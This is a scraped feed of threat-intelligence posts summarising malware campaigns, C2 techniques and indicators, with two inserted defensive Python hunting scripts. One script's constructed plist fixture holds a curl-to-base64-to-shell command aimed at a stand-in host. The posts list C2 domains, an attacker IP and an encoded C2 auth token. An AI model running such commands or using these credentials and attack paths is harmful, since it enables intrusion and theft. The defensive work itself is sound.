DFIR Radar

1.6K posts

@DFIR_Radar

Keeping DFIR Intelligence on your Radar.

Joined March 2025
1 Following · 1.3K Followers
Pinned Tweet
DFIR Radar @DFIR_Radar
Hundreds of cybersecurity blogs, research reports, and advisories published every day. No one has time to read them all. And the one report that matters? It's buried somewhere in the noise. That's why DFIR Radar exists. We monitor the cybersecurity landscape around the clock. Every article is evaluated for DFIR relevance. Only what's genuinely useful makes it through. The rest never reaches your feed. This feed is the result of that process. Every article is sourced, evaluated, and published only if it meets the standard. If you find something we missed, our Discord community lets you contribute directly. Discord community: discord.gg/rHkqgs53bF Built by a practitioner who needed this to exist. Follow once. Stay informed forever. #DFIR_Radar

DFIR Radar @DFIR_Radar
Attackers abuse Vercel's AI web development platform to mass-produce convincing phishing sites spoofing major brands with simple text prompts. #DFIR_Radar

DFIR Radar @DFIR_Radar
ShinyHunters isn't one group—it's a brand applied to supply chain attacks using stolen credentials, vishing, and OAuth token abuse. Real pattern: legitimate auth followed by rapid persistence, SaaS enumeration, then data exfiltration. #DFIR_Radar

DFIR Radar @DFIR_Radar
SpecterOps researchers dissect Visual Studio Code Dev Tunnels protocol, revealing a multi-layered C2 framework disguised as legitimate developer tooling. New attack paths exploit OAuth2 flows and Microsoft's Family of Client IDs (FOCI).

Technical breakdown:
• 4-layer protocol stack: REST API management → WebSocket tunnel → SSH connection → MsgPack RPC messaging
• RPC methods enable full remote access: spawn (command execution), fs_read/write (file operations), sys_kill (process termination)
• Authentication via GitHub (client ID: 01ab8ac9400c4e429b23) or Azure (client ID: aebc6443-996d-45c2-90f0-388ff96faa56)
• FOCI exploitation: 49 Microsoft clients can pivot tokens to access dev tunnels, including Teams and Azure Portal
• Device code phishing viable against both GitHub and Azure OAuth flows

Attack surface expansion:
• Persistence: Deploy tunnels from compromised hosts for long-term access
• Lateral movement: Pivot through existing dev tunnel infrastructure
• Initial access: Exploit FOCI/BroCI token relationships for tunnel hijacking
• Credential harvesting: Tokens stored in VS Code's state.vscdb database

Hunt for unexpected WebSocket connections to `*.devtunnels.ms` domains and monitor OAuth token requests to the specified client IDs. Full Ouroboros C2 tool available at the researchers' GitHub. #DFIR_Radar
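A small hunt over constructed log lines for the two indicators the post above names (connections to `*.devtunnels.ms` hosts and OAuth token requests carrying the GitHub or Azure Dev Tunnels client ID), added here as an example and not code from SpecterOps or DFIR Radar. The `<ts> <src> <user> <method> <url>` field layout and the assumption that `client_id` is visible in the logged URL are mine.

```python
"""Hunt for VS Code Dev Tunnels indicators in proxy and OAuth logs.

Added example, not from the SpecterOps research or DFIR Radar. It scans
constructed log lines for the two signals the post names: connections to
*.devtunnels.ms hosts and token requests carrying the GitHub or Azure
client ID Dev Tunnels authenticates with. The "<ts> <src> <user> <method>
<url>" layout, and client_id appearing in the logged URL, are assumptions.
"""
import re
from urllib.parse import parse_qs, urlparse

# Client IDs quoted in the post; everything else here is constructed.
DEVTUNNEL_CLIENT_IDS = {
    "01ab8ac9400c4e429b23": "github",
    "aebc6443-996d-45c2-90f0-388ff96faa56": "azure",
}
# Match devtunnels.ms and any subdomain, but not lookalikes such as devtunnels.ms.example.com.
DEVTUNNEL_HOST = re.compile(r"(^|\.)devtunnels\.ms$", re.IGNORECASE)

SAMPLE_LOG = """\
2025-06-01T10:00:01Z 10.1.2.3 alice GET https://code.visualstudio.com/docs
2025-06-01T10:00:05Z 10.1.2.3 alice CONNECT wss://abc123-8080.euw.devtunnels.ms/ws
2025-06-01T10:00:09Z 10.1.2.9 bob POST https://login.microsoftonline.com/common/oauth2/v2.0/token?client_id=aebc6443-996d-45c2-90f0-388ff96faa56&grant_type=device_code
2025-06-01T10:00:12Z 10.1.2.9 bob POST https://github.com/login/oauth/access_token?client_id=01ab8ac9400c4e429b23
2025-06-01T10:00:20Z 10.1.2.3 alice GET https://devtunnels.ms.example.com/
"""


def scan_line(line: str):
    """Return a finding for one log line, or None when nothing matches."""
    parts = line.split()
    if len(parts) < 5:
        return None
    ts, src, user, _method, url = parts[:5]
    parsed = urlparse(url)
    host = parsed.hostname or ""
    if DEVTUNNEL_HOST.search(host):
        return {"ts": ts, "src": src, "user": user, "signal": "devtunnels_host", "detail": host}
    # Token requests: flag any client_id that belongs to Dev Tunnels.
    for cid in parse_qs(parsed.query).get("client_id", []):
        if cid in DEVTUNNEL_CLIENT_IDS:
            signal = "oauth_%s_client_id" % DEVTUNNEL_CLIENT_IDS[cid]
            return {"ts": ts, "src": src, "user": user, "signal": signal, "detail": cid}
    return None


def hunt(log_text: str) -> list:
    """Run scan_line over every line and keep the findings, in log order."""
    return [f for f in (scan_line(ln) for ln in log_text.splitlines()) if f]
```

Running `hunt(SAMPLE_LOG)` yields three findings: the tunnel host for alice and one token request per client ID for bob; the lookalike domain on the last line is not flagged.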

DFIR Radar @DFIR_Radar
Microsoft tracks macOS ClickFix campaign using fake utility guides to deliver SHub Stealer, Macsync, and AMOS infostealers. Three distinct attack chains bypass Gatekeeper by leveraging Terminal commands instead of traditional app bundles.

Key technical details:
• Initial access via fake troubleshooting sites hosting Base64-encoded Terminal commands
• Loader campaign creates persistence at ~/LaunchAgents/com.google.keystone.agent.plist mimicking Google Update
• Script campaign uses Telegram fallback C2 (hxxps://t[.]me/ax03bot) when primary infrastructure fails
• Helper campaign (AMOS) stages payloads in /tmp/helper or /tmp/update with virtualization detection
• All variants collect Keychain entries, browser credentials, cryptocurrency wallets, and iCloud data

Attack methodology:
• Social engineering through Medium blogs and Squarespace sites claiming macOS "fixes"
• Terminal execution bypasses Gatekeeper checks applied to .dmg files
• Russian/CIS keyboard layouts trigger kill switch in loader variant
• Trojanized crypto apps replace legitimate Trezor Suite, Ledger Wallet, and Exodus installations

Data exfiltration to endpoints like /api/debug/event, /gate/chunk, /upload.php, and /contact. Staging directories use patterns /tmp/shub_ and cleanup artifacts post-exfiltration. Hunt for curl commands with Base64 payloads, osascript execution from network streams, and LaunchAgent plist creation in user directories. #DFIR_Radar
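A triage routine for LaunchAgent plists that checks the persistence traits the post above describes (a label borrowing the Google Update name, and a command line that uses curl, base64 decoding or osascript), added here as an example and not code from Microsoft's report or DFIR Radar. The two plists are constructed, and the path treated as the legitimate Keystone location is an assumption.

```python
"""Triage macOS LaunchAgent plists for ClickFix-style persistence.

Added example, not from Microsoft's report or DFIR Radar. It flags the traits
the post describes: a label borrowing the Google Update (Keystone) name and
ProgramArguments that curl, base64-decode or run osascript. The plists are
constructed; the legitimate Keystone path below is an assumption.
"""
import plistlib
import re

SUSPICIOUS_ARGS = {
    "curl_fetch": re.compile(r"\bcurl\b"),
    "base64_decode": re.compile(r"\bbase64\b.*(-d|--decode|-D)\b"),
    "osascript": re.compile(r"\bosascript\b"),
    "shell_c": re.compile(r"\b(sh|bash|zsh)\s+-c\b"),
}
MIMICKED_LABEL = "com.google.keystone.agent"  # label quoted in the post
LEGIT_KEYSTONE_PATH = re.compile(r"/Library/Google/GoogleSoftwareUpdate/")  # assumed


def triage_plist(raw: bytes) -> dict:
    """Return the label, the flattened command line and the indicator hits."""
    data = plistlib.loads(raw)
    label = str(data.get("Label", ""))
    args = [str(a) for a in data.get("ProgramArguments", [])]
    cmdline = " ".join(args)
    hits = [name for name, rx in SUSPICIOUS_ARGS.items() if rx.search(cmdline)]
    # A Keystone label whose program lives outside Google's own path is a mimic.
    if label == MIMICKED_LABEL and not LEGIT_KEYSTONE_PATH.search(cmdline):
        hits.append("keystone_label_mismatch")
    if hits and data.get("RunAtLoad"):  # suspicious and started at login
        hits.append("run_at_load")
    return {"label": label, "cmdline": cmdline, "hits": hits}

# Constructed plists: the first mimics the loader's persistence, the second is benign.
MALICIOUS_PLIST = b"""<?xml version="1.0"?><plist version="1.0"><dict>
<key>Label</key><string>com.google.keystone.agent</string>
<key>ProgramArguments</key><array>
<string>/bin/sh</string><string>-c</string>
<string>curl -fsSL http://example.invalid/u | base64 -d | sh</string>
</array>
<key>RunAtLoad</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0"?><plist version="1.0"><dict>
<key>Label</key><string>com.google.keystone.agent</string>
<key>ProgramArguments</key><array>
<string>/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent</string>
</array>
<key>RunAtLoad</key><true/>
</dict></plist>"""
```

Point `triage_plist` at the bytes of each file under a user's LaunchAgents folder; a non-empty `hits` list is what to review.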

DFIR Radar @DFIR_Radar
OceanLotus 🇻🇳 deploys ZiChatBot malware via PyPI supply chain attack targeting Python developers globally. Campaign active since July 2025 uses Zulip chat APIs as C2 infrastructure instead of traditional servers.

Key technical details:
• Three malicious PyPI packages (uuid32-utils, colorinal, termncolor) disguised as legitimate utilities with cross-platform Windows/Linux support
• ZiChatBot dropper (terminate.dll/terminate.so) uses AES-CBC decryption with key "xterminalunicode" and LZMA decompression
• Persistence via Registry Run key (Windows) or crontab (Linux): %LOCALAPPDATA%\vcpacket\vcpktsvr.exe
• C2 communications through Zulip REST APIs using auth token TW9yaWFuLWJvdEBoZWxwZXIuenVsaXBjaGF0LmNvbTpVOFJFWGxJNktmOHFYQjlyUXpPUEJpSUE0YnJKNThxRw==
• KTAE analysis shows 64% code similarity to previous OceanLotus droppers

Hunt for Python installations with recent %LOCALAPPDATA%\vcpacket\ directory creation, Registry Run entries for "pkt-update", and network connections to helper[.]zulipchat[.]com. #DFIR_Radar

DFIR Radar @DFIR_Radar
Iranian 🇮🇷 state-sponsored group MuddyWater masqueraded as Chaos ransomware in false flag operation, combining social engineering via Microsoft Teams with data exfiltration instead of encryption. Campaign targeting US 🇺🇸 organizations reveals growing convergence of APT and cybercriminal tactics.

Key technical details:
• Initial access via Teams screen-sharing sessions to harvest credentials and manipulate MFA (T1566, T1556)
• Custom Game.exe RAT masquerading as WebView2, using AES-256-GCM encrypted config and anti-VM checks
• "Donald Gay" code-signing certificate previously linked to MuddyWater's Operation Olalampo
• C2 infrastructure: moonzonet[.]com, uploadfiler[.]com, with persistence via DWAgent/AnyDesk (T1219)
• No file encryption despite ransomware branding - primary goal was espionage/data theft

Attack methodology:
• Interactive Teams sessions for credential harvesting into local text files (credentials.txt, cred.txt)
• Deployment of ms_upd.exe downloader via curl from 172[.]86[.]126[.]208:443
• Multi-stage payload delivery: WebView2Loader.dll, Game.exe, visualwincomp.txt config
• Lateral movement via compromised accounts and RDP sessions

Hunt for unsigned executables in C:\ProgramData\visualwincomp-* directories, monitor Teams external chat requests with screen-sharing, and check for DWAgent service installations. Full YARA rules and IOCs in the report. #DFIR_Radar

DFIR Radar @DFIR_Radar
New Brazilian banking trojan TCLBANKER hijacks WhatsApp and Outlook to self-propagate while targeting 59 financial institutions with sophisticated WPF-based social engineering overlays.

• **Technical Arsenal**: Environment-gated AES decryption, syscall trampolines, ETW patching, comprehensive watchdog targeting analysis tools (Frida, x64dbg, IDA, ProcessHacker). Uses DLL sideloading against legitimate Logitech LogiAiPromptBuilder.exe
• **Attack Chain**: MSI installer → DLL sideload → .NET Reactor-protected modules (banker + worm). Geofencing requires Brazilian 🇧🇷 locale/timezone. Persistence via scheduled task "RuntimeOptimizeService"
• **Social Engineering**: Full-screen WPF overlays with fake Windows Update screens, credential prompts with Brazilian phone formatting, "vishing wait screens" for phone-based fraud. Overlays invisible to screen capture tools via WDA_EXCLUDEFROMCAPTURE
• **Self-Propagation**: WhatsApp bot clones browser profiles to hijack authenticated sessions, sends malicious links to contacts. Outlook bot uses COM automation to send phishing emails from victim's own account
• **Infrastructure**: All C2/distribution on Cloudflare Workers (campanha1-api.ef971a42[.]workers[.]dev, mxtestacionamentos[.]com). Developer artifacts suggest early operational stage

Hunt for LogiAiPromptBuilder.exe with suspicious child processes, monitor for .NET assemblies loaded from %LocalAppData%\LogiAI, and detect WebSocket connections to suspicious domains. #DFIR_Radar

DFIR Radar @DFIR_Radar
Attackers weaponize JavaScript runtime Bun to distribute NWHStealer infostealer through game trainers and software cracks. Novel technique uses legitimate bundling tool to evade detection while targeting browsers and crypto wallets.

Key technical details:
• NWHStealer distributed via ZIP archives containing Installer.exe with JavaScript bundled using Bun runtime
• Anti-VM scoring system uses 10+ PowerShell CIM/WMI commands checking CPU, disk, memory, processes against sandbox indicators
• Two-stage C2 communication: /api/report sends system info, /api/status gets AES seed, /api/update retrieves encrypted payload
• Final payload decrypted with AES-256-CBC and injected using VirtualAlloc/VirtualProtect via Bun's FFI module
• Targets browsers, crypto wallets, FTP clients (FileZilla, CoreFTP), messaging apps (Steam, Discord)

Impact includes credential theft, cryptocurrency wallet compromise, and potential secondary payload deployment like XMRig miners. C2 domains include silent-harvester[.]cc and whale-ether[.]pro. Hunt for Bun.exe processes with network connections to low-reputation domains and PowerShell child processes executing CIM queries for hardware enumeration. #DFIR_Radar

DFIR Radar @DFIR_Radar
CVE-2026-0300 actively exploited against Palo Alto PAN-OS firewalls - buffer overflow in User-ID portal enables unauthenticated RCE with root privileges (CVSS 9.3). Restrict portal access to trusted internal IPs until patches release May 13-28. #DFIR_Radar

DFIR Radar @DFIR_Radar
Cisco Talos analysis reveals phone numbers in scam emails have 14-day median lifespan, with VoIP providers like Sinch most abused. Sequential number blocks and cross-brand reuse patterns expose organized call center infrastructure. #DFIR_Radar